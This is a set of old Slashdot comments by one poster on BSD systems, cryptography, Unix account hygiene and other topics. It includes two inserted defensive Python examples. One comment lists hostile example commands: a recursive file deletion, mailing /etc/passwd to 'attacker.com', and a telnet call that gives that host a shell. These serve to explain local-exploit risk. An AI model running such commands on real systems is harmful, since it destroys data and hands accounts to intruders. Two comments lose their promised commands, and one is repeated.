For the record, I'm using FreeBSD with Konqueror and Mozilla.
Try clicking those links at the bottom of the page. You can't get to ``Terms of Use,'' but ``Advertise'' works just fine.
b&
Don't be a zealot. (on Selling BSD · Score: 4, Insightful)
Mr. Lucas makes an excellent point: just because you might have the superior technical solution--one that would be everything the company needs and cost no money--it won't do you much good if The Powers That Be have closed minds.
Opening closed minds takes a looong time. Don't try to do everything all at once, and don't nag while you're doing it.
b&
> was able to load all 6500 of my MP3s on my home network in just a few minutes.
> Since we know that all MP3s are only backup copies of what we have already purchased, I'm sure that Taco actually paid for all that music and the musicians were properly paid for their effort. :)
I'll believe him on this one...but, figuring about fifteen tracks per CD, and about fifteen dollars per CD, we also know that Taco has given the RIAA about $6500 dollars.
Not counting, of course, the CDs he has yet to rip.
And we wonder where they get the money and power to ram through the DMCA and SSSCA....
b&
I wasn't aware that Mac OS X uses netinfo...but I'm sure a ``wanabee cracker'' would, considering this is an OS X-specific attack.
> And run something on port 666 on attacker.com that gives attacker.com shell access.
Mmmm. You mix things there. telneting to port 666 on attacker.com won't help you running anything on local port 666. man inetd is your friend, here.
Ah...you misunderstand me. The exploit program on the attacked machine has full access to that machine as the user who downloaded it. The program starts a shell, connects to attacker.com, and redirects I/O so that incoming packets from attacker.com are passed to the shell's stdin, and stdout and stderr are sent to attacker.com. Voila! Remote shell, initiated locally.
A good firewall, including use of proxy servers, would protect you from this particular scenario (which is why that's how I have things set up on my own network), but little else will.
Yours,
b&
If mass destruction is your aim, then the following will do the job nicely:
find / -user $USER -exec rm -f {} \;
Or, you could:
mail badguy@attacker.com </etc/passwd
Maybe it'd be a program to brute-force su, something often possible (brute-forcing ssh or telnet usually isn't).
With a bit more work, you could:
telnet attacker.com 666
And run something on port 666 on attacker.com that gives attacker.com shell access.
All this assumes the rest of the operating system's security is iron-clad. Local exploits are, in general, much easier to pull off than remote ones. Account compromise is not a nice thing, at all.
b&
...to ``protect'' children from being ``harmed'' by the sight of naked people having sex is not by passing laws.
It's by parents putting the computer in the living room.
Children are required to show ID before they can purchase a copy of ``Playboy'' or whatever because they can enter stores where pornography is sold without being accompanied by a responsible adult.
In the home, many adults have access to pornography through cable TV, videos, or copies of ``Playboy,'' or other means. Parents who don't want their children to see pornography on TV should be monitoring and restricting their children's access to TV--but they should be doing that anyway. If they can't lock out channels, they should lock up the remote with the VHS stash.
Parents who don't want children calling 1-900-LIVE-SEX should have the phone company block 900 numbers, or pay attention to their phone bills.
Parents who are really paranoid about the matter should know what kind of pornography exists in their children's friends' homes before allowing visits.
The computer should be treated no differently. You don't want your children surfing over to www.hotsexyteenlesbians.com? Fine, do it the same way you keep your children from all the rest of the pornography in the world.
And maybe, just maybe, recognize that children are also sexual beings. Talk with them about sex (in an age-appropriate manner, of course), relationships, pregnancy and parenthood, love, STDs, marriage, commitment, and what it all means to you.
Or, in other words, parents being parents and legislators making laws is good; parents making laws and legislators being parents is bad.
b&
> We've been hearing about adding crypto back doors for the government to snoop on us, but how would they work? Would there be one key that could be cracked opening up all such traffic?
If you're talking about public key cryptography or some form of key exchange protocol (such as what happens with PGP, SSL, and the like), then, yes, there'll be more than one key that can decrypt the message. PGP already allows you to encrypt a message to more than one recipient; a simple solution would be to require all software to always encrypt to Uncle Sam's key in addition to the intended recipients.
The other solution is to weaken the encryption algorithm in some way. There are very subtle approaches, but the simplest is to limit the length of the key. A 40-bit key takes half as long to crack with brute force as a 41-bit key, and a 42-bit key takes twice as long again (all else being equal). If you have an application that uses 128-bit keys, it could be ``dumbed down'' to a 40-bit key by forcing all keys to start with 88 zeroes (or some other known pattern).
How to get people to use such software when there's a wealth of reliable strong cryptographic software readily available is left as an exercise to the reader.
> Also, how would/does the government know whether a bitstream is random bits, or encrypted data?
Most encrypted streams have header information to make identification easy for the recipient. If you've ever gotten PGP-signed or -encrypted email, you've seen ``BEGIN PGP MESSAGE'' or some such at the top.
You could, of course, remove all such identification. If the encryption method is strong, what remains is provably indistinguishable from pure noise. If the recipient adds the identification back--if she puts ``BEGIN PGP MESSAGE'' before the bits--the result can be fed to the decryption process without trouble.
But how many people send random bitstreams to each other? Somebody doing so would stand out like a sore thumb against the usual traffic of ASCII.
The most commonly accepted solution is steganography, the art of hiding secrets in plain sight. ``All the twenty clever kings'' could mean ``attack'' if you were to just look at the first letter of every word. Common modern methods of steganography include encoding the message in the low-order bits of a JPEG, but the field is still young and many techniques a bit crude. If ``they'' are already looking at you, ``they'' will have a good chance of finding the message.
As always, Bruce Schneier's Applied Cryptography is a wonderful resource.
b&
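The comment above notes that an armor header makes an encrypted stream easy to identify, and that a header-less stream still stands out against ordinary ASCII traffic. The following is an added example, not part of the original post, of how a monitoring tool could tell the cases apart; the function names, the 7.5 bits/byte threshold, the 1024-byte minimum and all sample payloads are assumptions constructed for illustration.

```python
import base64
import hashlib
import math
import re
from collections import Counter

# Markers that OpenPGP ASCII armor places at the top of a message.
ARMOR_MARKERS = (
    b"-----BEGIN PGP MESSAGE-----",
    b"-----BEGIN PGP SIGNED MESSAGE-----",
)
BASE64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: close to 8 for ciphertext, far lower for prose."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


def looks_random(data: bytes, threshold: float = 7.5, min_len: int = 1024) -> bool:
    # Short samples cannot reach the threshold even when truly random,
    # so refuse to judge them (assumed cut-offs; tune against real traffic).
    return len(data) >= min_len and shannon_entropy(data) >= threshold


def classify(payload: bytes) -> str:
    """Return 'armored', 'raw-random', 'encoded-random' or 'text'."""
    if any(marker in payload for marker in ARMOR_MARKERS):
        return "armored"            # header left in place: trivial to spot
    if looks_random(payload):
        return "raw-random"         # header stripped, binary noise remains
    # Header stripped but body still base64: the bytes are ASCII, yet the
    # decoded content is noise. Only newlines are removed, so prose with
    # spaces or punctuation never matches the base64 pattern.
    compact = payload.replace(b"\r", b"").replace(b"\n", b"")
    if len(compact) % 4 == 0 and BASE64_RE.fullmatch(compact):
        if looks_random(base64.b64decode(compact, validate=True)):
            return "encoded-random"
    return "text"


def constructed_noise(size: int = 4096) -> bytes:
    """Constructed stand-in for ciphertext: SHA-256 over a counter."""
    return b"".join(
        hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(size // 32)
    )


# Constructed samples. ARMORED is not a valid OpenPGP message; only the
# marker line matters to the classifier.
NOISE = constructed_noise()
BODY = base64.encodebytes(NOISE)
ARMORED = b"-----BEGIN PGP MESSAGE-----\n\n" + BODY + b"-----END PGP MESSAGE-----\n"
PLAIN = b"Please send the quarterly report to the usual list by Friday. " * 40

if __name__ == "__main__":
    for name, sample in [("armored", ARMORED), ("noise", NOISE),
                         ("body only", BODY), ("plain", PLAIN)]:
        print(f"{name:10} {classify(sample):15} {shannon_entropy(sample):.2f}")
```
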
K.E. = .5 * m * v * v (on More On Tragedy · Score: 4, Informative)
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificent machines never again be used for such awful, awful purpose.
b&
I'm surprised nobody's yet mentioned union mounts, at least available in OpenBSD and FreeBSD.
The classical use for a union filesystem is to make a CD-ROM appear to be read-write. You mount the CD and then mount another partition on top of it with the union option. Any changes are made to the union-mounted partition.
The underlying filesystem doesn't have to be a CD-ROM, of course. Your problem could be quite easily solved with three disk partitions: two large enough to hold everything, and one large enough to hold the changes.
Start by mounting one of the large partitions and then union mounting the smaller one on top of it. If you need to roll back, simply unmount and newfs the union partition. When you want to commit, assume that wd1c and wd2c are your large partitions and wd3c is your small partition and do something like:
As an added bonus, the union-mounted filesystem can be mounted normally later and you only see the modified files.
Of course, if you're working with really large filesystems and time is critical, this is likely to be too slow for you.
b&
First, as others have noted, this is just another beta.
Having said that, if you want to get the sources, stop Slashdotting openoffice.org and get it from Akamai. At least they've got the bandwidth to deal with the load.
b&
I wrote about this the day after the attack:
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER [boeing.com] has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificent machines never again be used for such awful, awful purpose.
b&
That must explain why people keep sending me all these files that end in .doc, .xls, .ppt....
b&
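Blockquoth bonzoesc:
> Does nothing well. Look at the combination server/desktop platform our friends in Redmond have. (I'm not talking Nintendo, either.) It can't even keep a simple messaging service running.
I have moderator access at the moment, and was quite tempted to add to the ``troll'' moderation you've already received, but I've decided to reply, instead. I'm not into wasting mod points on games of mod-the-troll.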
FOLK is good for one thing, and one thing only: experimentation. And it does that thing extraordinarily well.
They make no pretenses that this is anything you'd actually want to use for anything serious. But, if you want to play around with the bleeding edge, you don't have to forge your own knife any more.
b&
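Blockquoth Traicovn:
> You're always going to risk loss of data and loss of service if you let someone else handle your data, communications, authorization, etc.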
True, but you also take the risk if you handle your own data. Most people don't make backups, and far too many of those who do have never tested them. What good is it to make a backup if you can't use it to recover from a disaster?
Microsoft's data loss in this case is inexcusable, and reason enough why anybody considering a move to Microsoft-hosted services for anything of any importance should instead run screaming to the hills.
But! Most people would still be taking less of a risk of data loss by trusting their data to Microsoft than taking care of it themselves.
The answer is to control your own data only if you have the expertise and equipment to do so. If you don't, then hire somebody who does.
Microsoft has, yet again, demonstrated that they don't.
b&
Blockquoth navindra:
Ack! No!
There's a common misconception out there that nobody has some special super-unprivileged status. That's not the case; nobody is no different from any other account.
The user/group nobody should only be used as it was originally intended, to limit access with UUCP. If you're not using UUCP on your system, you should be able to remove nobody and the system shouldn't even know the difference.
If you make something suid or sgid nobody, then you're giving that something and anybody/anything that runs it access to important parts of your UUCP subsystem, if said subsystem exists.
If you make two things suid or sgid nobody, you're giving both access to UUCP and you're giving them access to each other.
If you make both your Web server and your database server run as nobody, then nobody has become almost as powerful as root! Run unknown foreign executables as nobody as well, and you'll deserve what you get.
People, please don't use nobody for anything. Instead, create a new account just for that one special purpose. Your Web server should run as user httpd (or www or whatever you choose). Your database server should run as user mysql (or whatever). Your name server should run as named. If one gets compromised, it only has access to that one subsystem (though, granted, even that can be tragic).
For what it's worth, OpenBSD has no files or directories owned by either user or group nobody, though a few things do run as user nobody (such as the cron job to update the locate database and the fingerd and identd daemons).
b&
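One way to check a host for the sharing problem the comment above describes, as an added example that is not part of the original post: it groups running services by account and flags setuid/setgid files tied to nobody. The function names are hypothetical, and the `ps` and `ls -l` output is constructed sample data standing in for real command output.

```python
import os
from collections import defaultdict

# Constructed sample in the shape of `ps -axo user,pid,command` output.
PS_SAMPLE = """\
USER       PID COMMAND
root         1 /sbin/init
root        88 /usr/sbin/cron
nobody     412 /usr/local/sbin/httpd -DSSL
nobody     413 /usr/local/sbin/httpd -DSSL
nobody     520 /usr/local/libexec/mysqld --user=nobody
named      610 /usr/sbin/named
nobody     733 /usr/libexec/fingerd
www        800 /usr/sbin/httpd
"""

# Constructed sample in the shape of `ls -l` output for candidate files.
LS_SAMPLE = """\
-rwsr-xr-x  1 nobody  wheel   20480 Jan  1  2001 /usr/local/bin/gateway
-rwxr-sr-x  1 root    nobody  10240 Jan  1  2001 /usr/local/bin/spooler
-rw-r--r--  1 nobody  nobody    512 Jan  1  2001 /var/tmp/cache.db
-rwxr-xr-x  1 root    wheel   30720 Jan  1  2001 /usr/bin/true
"""


def services_by_account(ps_text):
    """Map each account to the sorted list of distinct programs it runs."""
    services = defaultdict(set)
    for line in ps_text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        user, _pid, command = fields
        services[user].add(os.path.basename(command.split()[0]))
    return {user: sorted(programs) for user, programs in services.items()}


def shared_accounts(ps_text, ignore=("root",)):
    """Accounts running more than one distinct service.

    Every service listed under one account can read, signal and modify
    whatever the others own, so a compromise of any one reaches them all.
    """
    return {
        user: programs
        for user, programs in services_by_account(ps_text).items()
        if user not in ignore and len(programs) > 1
    }


def privileged_files(ls_text, account="nobody"):
    """Files that hand out the account's identity via setuid or setgid."""
    findings = []
    for line in ls_text.splitlines():
        fields = line.split(None, 8)
        if len(fields) < 9 or len(fields[0]) < 10:
            continue
        mode, _links, owner, group = fields[:4]
        path = fields[8]
        if owner == account and mode[3] in "sS":   # owner-execute slot
            findings.append((path, "setuid " + account))
        if group == account and mode[6] in "sS":   # group-execute slot
            findings.append((path, "setgid " + account))
    return findings


if __name__ == "__main__":
    for user, programs in shared_accounts(PS_SAMPLE).items():
        print(f"{user} is shared by: {', '.join(programs)}")
    for path, reason in privileged_files(LS_SAMPLE):
        print(f"{path}: {reason}")
```
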
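Blockquoth the AC, AKA Lional Will:
> For example FreeBSD has kernel secure levels (-1, 0, 1 etc) that you can set to decide how secure you would like your kernel to operate, for example on higher security levels you can not open up /dev/mem or /dev/kmem for writing and other things, while on lower security levels you can do pretty much what a regular OpenBSD or NetBSD can do by default.
Ahem. OpenBSD has runlevels.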
It's also best to remember that security is not a feature set, but rather a process and a frame of mind. OpenBSD is designed to give you a platform which gives you a good start for your security process. An OpenBSD system can be made very insecure, and most any other operating system can be made very secure. One of OpenBSD's goals, however, is to make security a bit easier.
Besides, should TrustedBSD turn out to be something worthwhile--and it's rather likely it will--there's an excellent chance it'll find its way into the other BSDs. There's a heck of a lot of cross-pollination that goes on in the BSD world.
FreeBSD is very well suited to this kind of research. The other BSDs will benefit, just as all have benefited from OpenSSH, NetBSD's ports....
b&
The communication doesn't have to travel via satellite. The satellite is just used to exchange keys.
Or, in other words, this solves the same problem as RSA and D-H key exchange techniques. Once both sides have agreed on keys, you could use carrier pigeons for the actual encrypted data transmission.
b&
Obviously, most people won't put up with the hassle, but I've taken to using the GNU Keyring for PalmOS. It stores everything with 3DES and will generate random passwords for you. All I really have to remember is the one password to unlock it. You might think that (in my case) a twelve-character strong random mixed-case alphanumeric password would be hard to remember, but I enter it so many times a day it's easier if I don't think about it.
Before that, I would use something like this:
...and keep the result in my wallet. I figured that, if my wallet got lost or stolen, I was screwed anyway, and losing the passwords would be the least of my worries.
b&
If you don't like the service that Microsoft is offering--that is, if you want POP3 access and they won't give it to you--then don't use their service.
Sheesh, it's not like Microsoft already has a monopoly on email.
So you got a year's free access, and you feel you have to use it? If your computer came with a year's supply of dog food, would you eat it just because you don't have a dog?
b&
As I write this, the fortune at the bottom of the page reads:
So, not only is somebody asleep at the wheel, that somebody also thinks he's a clown.
(Yeah, I know the fortune is random.)
b&
...it's about the artist. The computer is just a different kind of brush.
New tools have always been met with controversy. The organ caused as much of an uproar as the Moog synthesizer; both are now celebrated. Photography wasn't considered an art until after people realized that it truly is an artistic medium.
Real Artists(tm) will understand that what you do with/on the computer needs to be evaluated based on its artistic merits, without prejudice based upon the tools you used to create it.
b&
Honestly, I don't understand what all the fuss is about.
Unless you're the kind who likes to pay for water, just use one of the many other Linux distributions out there that don't have such odious licensing terms. It's not like there aren't any alternatives out there.
Or, better, you can use something with no restrictions at all on how you use it.
If Caldera wants to shoot themselves in the foot, who are we to stop them?
b&
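Blockquoth the AC:
> um - no. Go read what Freedom REALLY is. The main feature is that nobody can connect your nym to you - NOT EVEN ZKS. That's the whole point. Even they can't track you.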
And who's to say that the same level of anonymity couldn't be implemented without ZKS? It's not like they're the only ones with skills in the field of cryptography.
b&
The basic idea behind Zero Knowledge's Freedom project is that your traffic gets pooled (in a cryptographically secure manner) with that of the rest of their customers in such a way that all anybody (but ZKS) can discover is that one of their customers is doing something.
It would seem to me that a cooperative group of people could accomplish much the same without too much trouble: set up an IPSEC WAN and a bunch of proxy servers that only speak to clients on the private side of the network. Use DNS load balancing, and all you know is that a request is coming from a participant of the WAN.
ZKS also offers pseudonymous email, web server profiles, newsgroups posting, etc--all very good. But there's no reason the cooperative couldn't provide similar functions.
ZKS runs the servers that do all the heavy lifting. In the cooperative, all the members would provide a piece of the heavy lifting.
Yes, I'm painting with a broad brush here, and even I could start to pick holes in the way I phrased some of all this. But, I think the basic idea is sound: rather than rely on a company like ZKS to do everything, have everybody chip in, even if it's just to share some bandwidth and CPU cycles. Surely if we can all cooperate sufficiently to create a number of operating systems--even if the form of cooperation is nothing more than using them--we can also cooperate to protect our privacy?
b&
The article says that the drive is $250; 10 Gbyte disks are $160; and 20 Gbyte disks are $200.
Now, why should I spend that much when the lowest price for a 10 Gbyte external USB drive on Pricewatch is $141, and a 20 Gbyte is $168?
C'mon, the form factor can't be worth that much, now, can it? Especially considering it's ``roughly the size of a handheld computer or PDA.''
b&